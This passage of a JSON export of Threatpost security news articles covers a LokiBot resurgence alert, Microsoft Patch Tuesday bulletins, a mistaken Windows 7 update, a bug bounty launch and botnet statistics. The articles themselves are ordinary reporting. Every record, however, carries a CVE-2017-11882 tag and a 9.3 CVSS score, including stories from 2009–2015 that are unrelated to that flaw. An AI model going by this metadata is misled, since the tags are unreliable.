vast majority of attacks are through phishing, malware infected machines and the reuse of passwords on third-party sites \u2013 none of which are helped by very long passwords,\u201d a Microsoft spokesman said. \n\n\u201cSixteen characters has been the limit for years now. We will always prioritize the protection needs of users\u2019 accounts and we will continue to monitor the new ways hijackers and spammers attempt to compromise accounts, and we design innovative features based on this. At this time, we encourage customers to frequently reset their Microsoft account passwords and use unique passwords that are different from other services.\u201d\n\n_This story was updated on Sept. 24 to add a comment from Microsoft. _\n", "cvss3": {}, "published": "2012-09-21T17:59:05", "type": "threatpost", "title": "Hotmail Limits Passwords to 16 Characters", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:29", "id": "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "href": "https://threatpost.com/hotmail-limits-passwords-16-characters-092112/77038/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-09T22:13:17", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that the LokiBot info-stealing trojan is seeing a surge across the enterprise landscape.\n\nThe uptick started in July, according to the agency, and activity has remained \u201cpersistent\u201d ever since.\n\nLokiBot targets Windows and [Android endpoints](<https://threatpost.com/lokibot-redux-common-android-apps/157458/>), and spreads mainly through email (but also via malicious websites, texts and messaging). It typically goes after credentials (usernames, passwords, cryptocurrency wallets and more), as well as personal information. The malware steals the data through the use of a keylogger to monitor browser and desktop activity, CISA explained.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cLokiBot has stolen credentials from multiple applications and data sources, including Windows operating system credentials, email clients, File Transfer Protocol and Secure File Transfer Protocol clients,\u201d according to the alert, [issued Tuesday](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>). \u201cLokiBot has [also] demonstrated the ability to steal credentials from\u2026Safari and Chromium and Mozilla Firefox-based web browsers.\u201d\n\nTo boot, LokiBot can also act as a backdoor into infected systems to pave the way for additional payloads.\n\nLike its Viking namesake, LokiBot is a bit of a trickster, and disguises itself in diverse attachment types, sometimes using steganography for maximum obfuscation. For instance, the malware has been disguised as a .ZIP attachment [hidden inside a .PNG file](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) that can slip past some email security gateways, or [hidden as an ISO disk image](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>) file attachment.\n\nIt also uses a number of application guises. Since LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications,\u201d CISA noted. For instance, in February, it was seen [impersonating a launcher](<https://www.trendmicro.com/en_us/research/20/b/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file.html>) for the popular Fortnite video game.\n\nOther tactics include the use of zipped files along with malicious macros in Microsoft Word and Excel, and leveraging the exploit [CVE-2017-11882](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) (an issue in Office Equation Editor that allows attackers to automatically run malicious code without requiring user interaction). The latter is done via malicious RTF files, researchers have observed.\n\nTo boot, researchers [have seen the malware being sold](<https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/>) as a commodity in underground markets, with versions selling for as little as $300.\n\nWith all of these factors taken together, LokiBot represents \u201can attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases,\u201d according to CISA.\n\nSaryu Nayyar, CEO at Gurucul, noted that the advisory is another indication of how malware authors have turned their malicious activities into a scalable business model.\n\n\u201cThe fact that LokiBot has been around for over four years and has gained in capability over time is a reflection of how much malicious actors have advanced the state of their art, leveraging the same development models we use in the commercial space,\u201d she said, via email.\n\nTo protect themselves, CISA said that companies should keep patches up to date, disable file- and printer-sharing services if not necessary, enforce multi-factor authentication and strong passwords, enable personal firewalls and scanning of downloads, and implement user education on how to exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known.\n", "cvss3": {}, "published": "2020-09-23T15:27:18", "type": "threatpost", "title": "CISA: LokiBot Stealer Storms Into a Resurgence", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-09-23T15:27:18", "id": "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "href": "https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:56:12", "description": "A [suspicious Windows 7 update](<https://answers.microsoft.com/en-us/windows/forum/windows_7-update/windows-7-update-appears-to-be-compromised/e96a0834-a9e9-4f03-a187-bef8ee62725e?auth=1>) today raised concern on a number of Microsoft and technology forums that the Windows Update service had been compromised. Microsoft, however, cleared the air several hours later admitting that the update was their mistake.\n\n\u201cWe incorrectly published a test update and are in the process of removing it,\u201d said a Microsoft spokesperson\n\nA compromise of such an automated update service would have had devastating results. Automated software update services have long been speculated as a means to spread malware at scale. Attackers or governments that infiltrate something like Windows Update could compromise software updates to the point where such services are no longer trusted, leaving endpoints and servers unpatched and at greater risk.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/09/07002408/accidental-windows-update.jpeg>)\n\nRated important, the mysterious update, purportedly a new language pack, showed up early this morning on home and business users\u2019 machines. The update was 4.3 MB in size and included long, random character file names and redirects to different .mil, .gov and .edu domains\u2014both of which were out of the norm for Windows updates.\n\nThe update has since disappeared from Windows Update, but not before it was pushed mostly to consumers via Windows Update. Some users said the update to install on their machines. Others who successfully installed the update essentially bricked their machines, according to replies on the original Windows 7 forum post.\n\nWindows Update and Windows Server Update Services (WSUS) are especially juicy targets. At Black Hat this summer, researchers Paul Stone and Alex Chapman of Context Information Security of the U.K. demonstrated [weaknesses in WSUS](<https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/>) that are difficult to address and expose any server or desktop using its automated updates to compromise.\n\nJust last week, the _[Washington Post](<https://www.washingtonpost.com/world/national-security/obama-administration-ponders-how-to-seek-access-to-encrypted-data/2015/09/23/107a811c-5b22-11e5-b38e-06883aacba64_story.html>) _reported that the U.S. government explored several approaches that technology providers could implement to cure the [Going Dark crypto issue](<https://threatpost.com/feasible-going-dark-crypto-solution-nowhere-to-be-found/114150/>). Law enforcement and government officials have expressed concern over recent changes from Apple and Google, in particular, to divorce themselves from storing encryption keys. The practice, government says, hinders law enforcement and national security investigations. They suggest, according to the _Post _article, that under a court order, the government could drop spyware on machines via software update services.\n\nAt TrustyCon, a 2014 event adjunct to RSA Conference, ACLU principal technologist Chris Soghoian delivered a talk that also suggested the next wave of [surveillance efforts could target update services](<https://threatpost.com/are-automated-update-services-the-next-surveillance-frontier/104558/>).\n\nSoghoian said his concern is that the government will not only exploit the convenience of these update services offered by most large providers, but also that it will erode the trust users have in the services leaving them vulnerable to cybercrime, identity theft and fraud.\n\n\u201cThere are really sound security reasons why we want automatic security updates. If consumers have to do work to get updates, they won\u2019t, and they will stay vulnerable,\u201d Soghoian said in 2014. \u201cWhat that means though is giving companies root on our computers\u2014and we really don\u2019t know what\u2019s in the code after fact. This is a point of leverage the government can use. We have no evidence they are using it right now, but these companies have a position of power over our devices that is unparalleled.\u201d\n", "cvss3": {}, "published": "2015-09-30T15:22:01", "type": "threatpost", "title": "Mystery Windows 7 Update An Accidental Test Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-02T16:00:39", "id": "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "href": "https://threatpost.com/suspicious-windows-7-update-actually-an-accidental-microsoft-test-update/114860/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:03", "description": "[](<https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/>)\n\nA security researcher from nCircle is accusing Microsoft of gamesmanship in its description of an unpatched IIS vulnerability in the way the WebDAV extension decodes a requested URL. The end result is that a successful exploit would allow a hacker to bypass authentication and gain unauthorized access to resources.\n\n\u201cMicrosoft has classified this issue two different ways in two different places,\u201d he said. \u201c[On the SRD blog ](<http://blogs.technet.com/srd/archive/2009/05/18/more-information-about-the-iis-authentication-bypass.aspx>)(it) refers to this as a Information Disclosure vulnerability, while [the Microsoft Advisory ](<http://www.microsoft.com/technet/security/advisory/971492.mspx>)refers to this as an elevation of privilege,\u201d says nCircle\u2019s Tyler Reguly.\n\nThe point, he said, is that the bug should be called what it is\u2013an access control breach or an authentication bypass. SRD acknowledges the Authentication Bypass but downplays it because you are accessing a single page with the anonymous user privileges, he added.\n\n[Read the full story](<http://securitywatch.eweek.com/browsers/security_researcher_microsoft_downplaying_iis_vulnerability.html?kc=rss>) [eweek.com]\n\nHere\u2019s [our previous coverage](<https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/>) of this issue.\n", "cvss3": {}, "published": "2009-05-21T00:03:55", "type": "threatpost", "title": "Microsoft accused of downplaying IIS flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:07", "id": "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "href": "https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/72754/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:53", "description": "Microsoft has been busy of late, what with the scramble surrounding the [Flame malware](<https://threatpost.com/microsoft-details-flame-hash-collision-attack-060612/>) and the forged certificate that the attackers were able to use to spread the malware via a fake Windows Update service. Now, the company is planning to release seven bulletins next Tuesday covering 28 vulnerabilities in its [June Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jun>).\n\nThree of the bulletins Microsoft will release are rated critical, and all of the vulnerabilities they cover can lead to remote code execution. The four other bulletins are rated important, and one of those can result in remote code execution. The seven bulletins will fix flaws in Windows, the .NET Framework, Microsoft Dynamics, Internet Explorer and Visual Basic for Applications.\n\nMicrosoft also will be rolling out a change to its Windows Update service in the coming days that is designed to harden the infrastructure and prevent the kind of attack that the Flame authors were able to pull off. That change will involve deploying a new certificate that will be the only one trusted by WU clients, and that certificate only will be used to protect WU files.\n\nHere\u2019s the list of the bulletins:\n\nBulletin ID | Maximum Severity Rating and Vulnerability Impact | Restart Requirement | Affected Software \n---|---|---|--- \nBulletin 1 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | Requires restart | Microsoft Windows \nBulletin 2 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | Requires restart | Microsoft Windows, \nInternet Explorer \nBulletin 3 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | May require restart | Microsoft Windows, \nMicrosoft .NET Framework \nBulletin 4 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | May require restart | Microsoft Office, \nMicrosoft Visual Basic for Applications \nBulletin 5 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | May require restart | Microsoft Dynamics AX \nBulletin 6 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | Requires restart | Microsoft Windows \nBulletin 7 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | Requires restart | Microsoft Windows\n", "cvss3": {}, "published": "2012-06-07T17:29:16", "type": "threatpost", "title": "Microsoft to Fix 28 Vulnerabilities in June Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:05", "id": "THREATPOST:E46805A1822D16B4725517D4B8786F57", "href": "https://threatpost.com/microsoft-fix-28-vulnerabilities-june-patch-tuesday-060712/76662/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "[](<https://threatpost.com/barracuda-networks-launches-bug-bounty-program-110910/>)Following the lead of Mozilla and Google, Barracuda Networks is launching a bug bounty program that will pay out cash rewards for vulnerabilities found in the company\u2019s own products.\n\nThe move by Barracuda, a maker of mail security and data protection products, is the first such bug bounty program offered by a pure security technology vendor. Mozilla and Google are the two most prominent examples of general technology companies that offers rewards for vulnerabilities, and both of those companies have seen their programs succeed in the last year. In fact, both Google and Mozilla have raised the prices that they pay for the most severe bugs, with [Mozilla shelling out up to $3,000](<https://threatpost.com/mozilla-bumps-bug-bounty-3000-071610/>) and [Google paying as much as $3,133.7 for bugs](<https://threatpost.com/google-ups-bug-bounty-ante-313370-072010/>).\n\nBarracuda officials said they\u2019ll match Google\u2019s top price for severe bugs and the minimum bug bounty will be $500. The company will only pay out rewards for bugs that are disclosed privately to Barracuda, although once the bug is fixed, the researcher is free to disclose it publicly. Bugs found in barracuda\u2019s Spam and Virus Firewall, Web Filter, Web Application Firewall and NG Firewall are eligible for the cash rewards. \n\nBugs that are in scope for the reward program are vulnerabilities that compromise confidentiality, availability, \nintegrity or authentication. Those would include vulnerabilities such as remote exploits, privilege \nescalation, cross site scripting, code execution, command injection. \n\n\u201cSecurity product vendors should be at the \nforefront of promoting security research,\u201d Paul Judge, chief research \nofficer at Barracuda Networks, said in a statement. \u201cThis initiative reflects our commitment to \nour customers and the security community at large. The goal of this program is \nto reward researchers for their hard work as well as to promote and encourage \nresponsible disclosure.\u201d\n\nAs a profitable, legitimate market for vulnerability information has developed in recent years with the success of the Zero Day Initiative and other third-party brokers, there has been more and more pressure on the vendors themselves to pay for bugs. \n\nWhile Mozilla and Google officials have been happy with the results of \ntheir bug bounty programs\u2013[Google in fact just expanded its program to \nits web properties](<https://threatpost.com/google-extends-bug-bounty-web-properties-110110/>)\u2013and researchers have praised the companies for \nrecognizing their work, other high-profile software vendors have stayed \non the sidelines. Microsoft officials have repeatedly said that the \ncompany will not pay for bugs and Apple and Adobe, which have been under \nincreased scrutiny by attackers and researchers of late, have not \noffered bounties either.\n", "cvss3": {}, "published": "2010-11-09T14:28:15", "type": "threatpost", "title": "Barracuda Networks Launches Bug Bounty Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:14:41", "id": "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "href": "https://threatpost.com/barracuda-networks-launches-bug-bounty-program-110910/74652/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "As expected, Microsoft delivered a patch today for a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) that was disclosed by HP\u2019s Zero Day Initiative three weeks ago, six months after it was reported to the ZDI.\n\nThe IE8 patch, [MS14-035](<https://technet.microsoft.com/library/security/ms14-035>), is included in a cumulative Internet Explorer rollup that patches 59 flaws in the browser. Most of them are remote-code execution bugs rolling all the way back to IE 6 running on Windows Server 2003 SP2.\n\nThe zero day affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. Microsoft said in May that it was aware of the issue.\n\n\u201cAlthough no attacks have been detected in the wild, the ZDI advisory has given attackers a head start understanding this vulnerability, possibly reducing the time required for researchers to reverse engineer the fix and devise exploit code,\u201d said Craig Young, a security researcher with Tripwire.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nExperts are urging IT administrators to take a close look at a bulletin for Microsoft Word, [MS14-034](<https://technet.microsoft.com/library/security/ms14-034>), which while rated important by Microsoft, should be the next highest patching priority behind IE.\n\nAffecting Microsoft Word 2007, users could be exposed to remote code execution exploits if a malicious Word document is opened on a vulnerable computer.\n\n\u201cMicrosoft rates it only \u2018important\u2019 because user interaction is required\u2014one has to open a Word file\u2014but it allows the attacker Remote Code Execution. In addition, attackers have become quite skilled at tricking users into opening files,\u201d said Qualys CTO Wolfgang Kandek. \u201cWho wouldn\u2019t open a document that brings new information about the company\u2019s retirement plan? The Word vulnerability is in the newer DOCX file format and only applies to the 2007 release. If you are using the newer versions of Office/Word 2010 or 2013 you are not affected.\u201d\n\nThe second critical bulletin, [MS14-036](<https://technet.microsoft.com/library/security/ms14-036>), patches remote code execution bugs in Microsoft graphics in Office and Lync that could be exploited by users visiting malicious webpages or opening a malicious Office file.\n\n\u201cGraphics parsing requires complex logic and has frequently been associated with attack vectors,\u201d said Kandek. \u201cIt affects Windows, Office and the Lync IM client because they all bring their own copy.\u201d\n\nThis month bring 2014\u2019s total number of bulletins issued by Microsoft to 36, well below last year\u2019s pace of 46 through June.\n\n\u201cWe have become accustomed to see around 100 security bulletins for Microsoft products a year, but it looks as if we are in for fewer this year. This runs counter to the general tendency of the year which has already seen its shares of big breaches, 0-days and the big Heartbleed vulnerability in OpenSSL,\u201d Kandek said. \u201cMaybe the reduced count is based on the increased presence of vulnerability brokers that buy up vulnerabilities for internal use? We will see how the second part of the year develops.\u201d\n\nThe remaining bulletins are rated important and include a pair of information disclosure bugs, one denial of service flaw and a tampering vulnerability.\n\n * [MS14-033](<https://technet.microsoft.com/library/security/ms14-033>) addresses an information disclosure vulnerability in Microsoft XML Core Serivces; an exploit on a website designed to invoke XML Core Services through IE could leak data to an attacker.\n * [MS14-032](<https://technet.microsoft.com/library/security/ms14-032>) also patches an information disclosure bug in Microsoft Lync Server. A user tricked into joining a Lync meeting by clicking on a malicious meeting URL could be exploited.\n * [MS14-031](<https://technet.microsoft.com/library/security/ms14-031>) fixes a denial-of-service bug in TCP. An attacker sending a malicious sequence of packets to the target system could cause it to crash.\n * [MS14-030](<https://technet.microsoft.com/library/security/ms14-030>) patches a vulnerability in Remote Desktop that could allow tampering, Microsoft said. If an attacker has man in the middle access to the same network segment as the targeted system during an RDP session and sends malicious RDP packets, they could exploit the vulnerability.\n\n**Adobe Patches Flash Player**\n\nAdobe released a new version of Flash Player that addresses a [critical vulnerability](<http://helpx.adobe.com/security/products/flash-player/apsb14-16.html>) in the software.\n\nFlash 13.0.0.214 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.359 and earlier versions for Linux are affected.\n\nAdobe said there are no active exploits against these vulnerabilities.\n", "cvss3": {}, "published": "2014-06-10T14:09:16", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday security updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-13T15:41:16", "id": "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "href": "https://threatpost.com/microsoft-patches-ie8-zero-day-critical-word-bug/106572/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "This video features Tim Rains and Vinny Gullotto of Microsoft discussing the major threats from the second half of 2008.\n", "cvss3": {}, "published": "2009-06-22T10:33:11", "type": "threatpost", "title": "Microsoft Security Intelligence Report: The Vinny and Tim Show", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "href": "https://threatpost.com/microsoft-security-intelligence-report-vinny-and-tim-show-062209/72853/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:57", "description": "**UPDATE \u2013 **In an unexpected turn, Microsoft\u2019s monthly Patch Tuesday security updates released today did not include patches for Internet Explorer vulnerabilities used during the Pwn2Own contest one month ago.\n\nThe popular hacker contest attracted researchers from all over who were targeting all the major browsers, as well as third-party software such as [Flash and Java](<https://threatpost.com/firefox-java-flash-all-taken-down-pwn2own-030713/>). Companies such as VUPEN and MWR Labs were able to beat locked-down versions of [IE 10 running on Windows 8](<https://threatpost.com/pwn2own-browser-exploits-getting-harder-more-expensive-find-030613/>) and Mozilla\u2019s Firefox browser, as well as Chrome running on Windows. Unlike Mozilla and Google, both of which [patched the flaws exploited during the contest within 24 hours](<https://threatpost.com/mozilla-and-google-patch-browser-flaws-used-pwn2own-030813/>), Microsoft had yet to update its browser. This has been compounded after last Thursday\u2019s advanced notification that indicated a cumulative IE update was coming today.\n\n\u201cThis puts them quite a bit behind other browsers that already patched their Pwn2Own bugs,\u201d said Andrew Storms, director of security operations at nCircle.\n\nA Microsoft representative, along with Qualys CTO Wolfgang Kandek, said the delay is likely due to regression testing and QA work necessary for patches.\n\n\u201cMicrosoft works with the security community to protect our customers against all threats and we are investigating possible issues identified by researchers during the Pwn2Own competition. We are not aware of any attacks and the issues should not affect our customers, as Pwn2Own organizers do not publicly disclose the competition\u2019s findings,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing.\n\nToday\u2019s IE rollup addresses a pair of critical remote code execution flaws in versions 6-10 the browser. Both are use- after free vulnerabilities that exist in the way IE accesses objects in memory that have been deleted. \u201cThese vulnerabilities may corrupt memory in such a way that an attacker could execute arbitrary code in the context of a user,\u201d Microsoft said in its advisory [MS13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). Users would have to be lured to a website hosting an exploit via a phishing or spam email, Microsoft said.\n\n\u201cMS13-028 has a score of \u201c2\u201d in the Exploitability Index, indicating that the construction of an exploit for the vulnerability is not entirely straightforward and not expected within the next 30 days,\u201d Kandek said.\n\nThe IE update is one of nine bulletins released today addressing 14 vulnerabilities, a relatively light month compared to the 57 updates foisted upon users in February. One other bulletin was rated critical, another remote code execution vulnerability in Microsoft Remote Desktop Client. [MS13-029](<https://technet.microsoft.com/en-us/security/bulletin/ms13-029>) includes patches for Remote Desktop Connection 6.1 Client and Remote Desktop Connection 7.0 Client on Windows XP, Vista and Windows 7, as well as Windows Server 2003, 2008 and 2008 R2.\n\n\u201cA remote-code execution vulnerability exists when the Remote Desktop ActiveX control, mstscax.dll, attempts to access an object in memory that has been deleted. An attacker could exploit the vulnerability by convincing the user to visit a specially crafted webpage.\u201d Microsoft said in its alert. \u201cAn attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.\u201d\n\nRoss Barrett, senior manager of security engineering at Rapid7 said that while versions 6.1 and 7 are vulnerable, version 8 is unaffected and is not yet the default.\n\n\u201cThis issue could be triggered through an RDP link in a browser or other content. A workaround would be to set the \u2018kill-bit\u2019 for these ActiveX controls, but the update actually fixes the issue, rather than disabling the RDP control,\u201d Barrett said.\n\nStorms said there are enough mitigating circumstances to make it less problematic for most businesses.\n\n\u201cThe bug does not affect the latest RDP client, version 8, which dramatically reduces the affected number of machines,\u201d Storms said. \u201cMicrosoft has released mitigation steps to disable the affected ActiveX control. Also, if your users browse with default IE settings, they will be presented with the \u2018gold bar\u2019 warning providing them with an opportunity to opt out of an attack.\u201d\n\nThe remaining seven bulletins are rated critical by Microsoft, a denial-of-service bug in Active Directory has caught experts\u2019 attention. [MS13-032](<https://technet.microsoft.com/en-us/security/bulletin/ms13-032>) could be triggered if an attacker sends a specially crafted query to the LDAP service that will consume CPU cycles and cause it to crash. The vulnerability affects Active Directory, Active Directory Application Mode (ADAM), Active Directory Lightweight Directory Service (AD LDS), and Active Directory Services on Microsoft Windows servers.\n\n\u201cIt should be high on the list for enterprise installations,\u201d Kandek said. \u201cAn attacker can shut down the domain controllers for an organization using only with a single workstation.\u201d\n\nAmong the remaining bulletins are privilege escalation vulnerabilities and an information disclosure bug:\n\n * [MS13-030](<https://technet.microsoft.com/en-us/security/bulletin/ms13-030>) is an information-disclosure vulnerability in SharePoint if an attacker knew the location of a SharePoint list and gained access with legitimate credentials.\n * [MS13-031](<https://technet.microsoft.com/en-us/security/bulletin/ms13-031>) is a privilege escalation flaw in the Windows Kernel. Exploits would require valid credentials in order to carry out an attack.\n * [MS13-033](<https://technet.microsoft.com/en-us/security/bulletin/ms13-033>) affects Windows Client/Server Runtime Subsystem in the way that the system handles objects in memory. Attackers would need valid credentials and local access to pull off an exploit.\n * [MS13-034](<http://technet.microsoft.com/en-us/security/bulletin/ms13-034>) is another privilege escalation bug, this time in Windows Defender, the Microsoft antimalware client. Successful exploits could enable an attacker to run code on an infected machine, view, change or delete data or create new accounts.\n * [MS13-035](<https://technet.microsoft.com/en-us/security/bulletin/ms13-035>) repairs a vulnerability in Microsoft HTML Sanitization Component found in Microsoft Office. An attacker would have to send a malicious Office document to pull off an attack.\n * [MS13-036](<https://technet.microsoft.com/en-us/security/bulletin/ms13-036>) patches three vulnerabilities in Kernel Mode Driver that elevates privileges for an attacker, who must have valid credentials and local access to exploit the flaws.\n\n_This article was updated to include a comment from Microsoft._\n", "cvss3": {}, "published": "2013-04-09T19:18:19", "type": "threatpost", "title": "Pwn2Own IE Vulnerabilities Missing from Microsoft Patch Tuesday Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-18T18:36:16", "id": "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "href": "https://threatpost.com/pwn2own-ie-vulnerabilities-missing-microsoft-patch-tuesday-updates-040913/77712/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:49", "description": "[](<https://threatpost.com/us-reigns-most-bot-infected-country-101310/>)The U.S. has by far the highest number of bot-infected computers of any country in the world, with nearly four times as many infected PCs as the country in second place, Brazil, according to a new report by Microsoft. The quarterly report on malicious software and Internet attacks shows that while some of the major botnets have been curtailed in recent months, the networks of infected PCs still represent a huge threat.\n\nThe data on botnets, published in [Microsoft\u2019s Security Intelligence Report](<https://www.microsoft.com/security/sir/default.aspx>) for the first half of 2010, paints a somewhat bleak picture of the botnet landscape. Between January and June of this year, Microsoft cleaned more than 6.5 million machines worldwide of bot infections, which represents a 100 percent increase in bot infections from the same period in 2009. This increase comes at a time when there is more attention than ever focused on the botnet problem, both by security researchers and law-enforcement agencies around the world.\n\nMicrosoft measures botnet infections by counting the number of machines \nthat are cleaned of bots by using the company\u2019s Malicious Software \nRemoval Tool. The Microsoft data obviously does not show a complete picture of bot infections across the entire Internet, but gives a snapshot of the infection problem on the machines the company monitors.\n\nIn the last year or so, several major spam botnets have been either completely crippled or in some way damaged by takedown efforts that target the command and control servers that run the botnets. Pushdo and Waledac are the two most prominent examples of this effort, and Microsoft officials were deeply involved in the [takedown of Waledac](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>), eventually going to court in September to get legal ownership of hundreds of IP addresses used by the botnet.\n\nThe company worked with researchers in Germany and Austria, as well as law-enforcement agencies, to gain control of the Waledac C&amp;C servers. However, while the takedown was something of a coup, Waledac was not the top spam botnet and Microsoft\u2019s data shows that there are still a number of large botnets, many of which are far less well-known than Waledac, Pushdo and Zeus, that are wreaking havoc online.\n\nThe most commonly detected bot client in the new SIR is Rimecud, the main piece of malware that is responsible for the Mariposa botnet. In the first half of 2010, Microsoft cleaned more than 3.5 million PCs infected with Rimecud. Some of the more famous botnets, including Rustock, Nuwar and Zbot are pretty far down the list of the most active botnets.\n\n\u201cRimecud is a \u2018kit\u2019 family: different people working independently use a malware creation \nkit to create their own Rimecud botnets. Rimecud is the primary malware family behind the \nso-called Mariposa botnet, which infected millions of computers around the world in 2009 and 2010. In July of 2010, the Slovenian Criminal Police arrested a 23-year-old Slovenian citizen suspected of writing the malware code, following the February 2010 arrests of three suspected Mariposa botnet operators by the Spanish Guardia Civil,\u201d Microsoft said in the report. \u201cRimecud is a backdoor worm that spreads via fixed and removable drives, and by sending malicious hyperlinks to a victim\u2019s contacts via several popular instant messaging programs. Rimecud can be commanded to take a number of typical botnet actions, including spreading itself via removable drives, downloading and executing additional malware, and stealing passwords.\u201d\n\nRimecud is unlike many other botnets as it has its own network protocol, based on UDP, that it uses for communications between the bots and the C&amp;C servers. A number of other botnets use modified, or somewhat customized, protocols for communication, making it more difficult for researchers to analyze the botnet\u2019s behavior. The attackers behind these botnets have become increasingly intelligent and sophisticated in recent years, and they have learned from their past mistakes, as well as the actions of researchers and law-enforcement agencies. \n\nOne of the key methods attackers have adopted to make life more difficult for researchers is to not use off-the-shelf bot software, but instead buy kits that can create custom bots.\n\n\u201cThese kits are collections of tools, sold and shared within the malware underground, that enable aspiring bot-herders to assemble their own botnet by creating and spreading customized malware variants. Several malware kits are freely available for downloading and sharing; some have been published as open source code, which enables malware developers to create modified versions of the kits.3 Other kits are developed by individual groups and sold like \nlegitimate commercial software products, sometimes even including support agreements,\u201d Microsoft said in the report. \n", "cvss3": {}, "published": "2010-10-13T16:07:04", "type": "threatpost", "title": "U.S. Reigns As Most Bot-Infected Country", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:36", "id": "THREATPOST:49045E816279C72FD35E91BF5F87387C", "href": "https://threatpost.com/us-reigns-most-bot-infected-country-101310/74570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:51", "description": "[](<https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/>)Microsoft on Tuesday released (again) the five security bulletins for its September Patch Tuesday. None of the fixes being released today is rated critical, with all five being rated important. Three of the bulletins fix flaws that could result in code execution.\n\nMicrosoft also updated the security bulletin it originally released a couple of weeks ago regarding the DigiNotar compromise, revoking trust for an additional six root certificates issued by the CA. The company removed trust for 